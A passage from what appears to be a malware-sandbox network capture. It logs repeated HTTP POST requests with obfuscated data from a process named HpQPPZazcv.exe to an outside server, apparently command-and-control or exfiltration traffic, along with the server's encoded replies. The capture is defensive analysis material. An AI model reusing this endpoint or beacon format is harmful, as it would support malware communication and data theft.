                                                                  Data Ascii: X_\PZDW_^ZZVP[P^UT\_TQZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?)V# \>2))U6+#(+3[%=:".+<:!_77 09^/.]+7
                                                                  Aug 1, 2024 04:28:50.120312929 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:50.251307011 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:49 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.449774194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:51.197138071 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:51.550384998 CEST2512OUTData Raw: 5d 53 59 51 5f 42 57 58 5e 5a 5a 56 50 59 50 5d 55 56 5c 59 54 5b 5a 5a 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]SYQ_BWX^ZZVPYP]UV\YT[ZZYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Z+)T4<_)3)=5"++$=*7$R(: $$]$-9^/.]+
                                                                  Aug 1, 2024 04:28:52.019542933 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:52.200499058 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:51 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.449775194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:51.311700106 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1996
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:51.659097910 CEST1996OUTData Raw: 58 50 5c 54 5a 47 57 5b 5e 5a 5a 56 50 59 50 51 55 57 5c 5b 54 50 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XP\TZGW[^ZZVPYPQUW\[TPZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%(0&7Z4X=01(?:5?^?;?Y3=7=;):9#$^0=9^/.]+
                                                                  Aug 1, 2024 04:28:52.113900900 CEST25INHTTP/1.1 100 Continue


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.449776194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:52.336977005 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:52.690565109 CEST2512OUTData Raw: 58 53 59 56 5a 47 57 59 5e 5a 5a 56 50 5a 50 58 55 56 5c 5e 54 5d 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XSYVZGWY^ZZVPZPXUV\^T]Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%_(-4?$>#&(?1Q#(/?;%=& - T<:*4Q#'-9^/.]+3
                                                                  Aug 1, 2024 04:28:53.138564110 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:53.269494057 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:53 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.449777194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:53.496398926 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2504
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:53.846669912 CEST2504OUTData Raw: 58 51 59 52 5a 47 57 5b 5e 5a 5a 56 50 5e 50 5d 55 52 5c 5d 54 5c 5a 5f 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XQYRZGW[^ZZVP^P]UR\]T\Z_YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%+ :#;>:=/-!+'\(/'. <U(: 7^39^/.]+3
                                                                  Aug 1, 2024 04:28:54.306552887 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:54.443778038 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:54 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.449778194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:54.721050978 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:55.065433979 CEST2512OUTData Raw: 58 50 5c 56 5a 40 57 5e 5e 5a 5a 56 50 58 50 5a 55 56 5c 58 54 5d 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XP\VZ@W^^ZZVPXPZUV\XT]Z\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%(U974*#*_=!V"(3Y<?^%=" .0V<677'=9^/.]+;
                                                                  Aug 1, 2024 04:28:55.505470991 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:55.685601950 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:55 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.449780194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:57.296452999 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1996
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:57.643682957 CEST1996OUTData Raw: 58 55 5c 56 5f 45 52 58 5e 5a 5a 56 50 57 50 58 55 57 5c 5b 54 5a 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XU\V_ERX^ZZVPWPXUW\[TZZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%< %4<]>3_>?)W#;?\+;+X'& .8U?-#;'=9^/.]+
                                                                  Aug 1, 2024 04:28:58.092801094 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:58.227440119 CEST380INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:57 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 1e 21 18 22 02 20 3d 2f 0e 39 39 25 05 28 0d 35 03 29 02 02 58 24 0d 2b 10 29 3e 3b 00 2a 2c 20 11 31 3d 2c 55 37 2c 25 56 28 26 2a 46 0c 10 25 5a 28 13 20 0d 32 3f 34 09 3a 33 3e 1e 25 10 11 5b 23 3c 32 16 37 15 38 14 2b 28 33 09 24 29 02 1b 3a 00 0c 15 31 0e 3d 02 34 0f 2a 54 02 15 24 0e 2a 2d 07 12 24 21 38 15 25 02 15 56 26 00 03 10 36 5a 25 13 23 00 2e 16 33 28 01 50 28 3e 2b 09 25 11 27 02 3f 31 00 0b 22 2d 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &!" =/99%(5)X$+)>;*, 1=,U7,%V(&*F%Z( 2?4:3>%[#<278+(3$):1=4*T$*-$!8%V&6Z%#.3(P(>+%'?1"- P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.449781194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:57.426158905 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:57.784280062 CEST2512OUTData Raw: 58 55 5c 53 5a 41 57 5b 5e 5a 5a 56 50 58 50 5b 55 51 5c 5f 54 5d 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XU\SZAW[^ZZVPXP[UQ\_T]ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(4/'>#:*<5!/Y?'[3>)U#=;+)9^#4]09^/.]+;
                                                                  Aug 1, 2024 04:28:58.225663900 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:58.364523888 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:58 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.449782194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:58.492227077 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:58.846752882 CEST2512OUTData Raw: 5d 51 5c 56 5f 40 57 5f 5e 5a 5a 56 50 59 50 5d 55 56 5c 5f 54 5a 5a 5e 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]Q\V_@W_^ZZVPYP]UV\_TZZ^YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%<%S7 > =(,Q6+'+ 3=78+[#7]'-9^/.]+
                                                                  Aug 1, 2024 04:28:59.289421082 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:59.423705101 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:59 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.449783194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:29:00.088128090 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:29:00.440613031 CEST2512OUTData Raw: 58 5e 5c 56 5f 44 57 5e 5e 5a 5a 56 50 5b 50 5b 55 51 5c 51 54 5f 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: X^\V_DW^^ZZVP[P[UQ\QT_ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&<&4,<_=\*?*!,<X0-T4><))="'8]39^/.]+7
                                                                  Aug 1, 2024 04:29:00.898355961 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:29:01.241123915 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:29:00 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z
                                                                  Aug 1, 2024 04:29:01.241213083 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:29:00 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.449784194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:29:01.528892040 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:29:01.878110886 CEST2512OUTData Raw: 58 51 5c 52 5f 4b 57 53 5e 5a 5a 56 50 58 50 5b 55 57 5c 5d 54 59 5a 5e 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XQ\R_KWS^ZZVPXP[UW\]TYZ^YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X(#9T <=*)P"+;Y++$$.& X'(5Z4'3=9^/.]+;
                                                                  Aug 1, 2024 04:29:02.326628923 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:29:02.455996037 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:29:02 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.449785194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:29:03.908575058 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1996
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:29:04.252912998 CEST1996OUTData Raw: 58 5e 59 55 5f 40 57 5d 5e 5a 5a 56 50 5d 50 5f 55 51 5c 59 54 59 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: X^YU_@W]^ZZVP]P_UQ\YTYZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%_+>!/+*0-)"$</'=- . <*#'8]39^/.]+/
                                                                  Aug 1, 2024 04:29:04.701478004 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:29:04.831768990 CEST380INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:29:04 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 1e 35 25 2d 13 34 07 2c 55 39 04 31 05 2b 55 39 00 28 3c 20 59 27 0d 28 0d 3c 03 38 5b 3f 3f 27 04 25 3d 34 57 23 3c 03 50 3f 36 2a 46 0c 10 26 07 3f 5b 20 09 31 01 0e 0d 39 09 3d 46 31 10 1e 03 35 11 36 1b 34 02 33 07 3f 3b 23 09 24 29 27 0b 2e 10 3d 01 31 37 00 58 34 35 2a 54 02 15 24 0f 3e 2d 0b 59 30 0c 19 07 25 3c 3c 0d 24 2e 2a 01 36 12 29 5b 20 07 0b 06 30 5e 20 0a 3f 00 01 08 31 06 3b 01 3e 21 3d 15 35 17 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &5%-4,U91+U9(< Y'(<8[??'%=4W#<P?6*F&?[ 19=F15643?;#$)'.=17X45*T$>-Y0%<<$.*6)[ 0^ ?1;>!=5 P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.449786194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:29:03.942960978 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
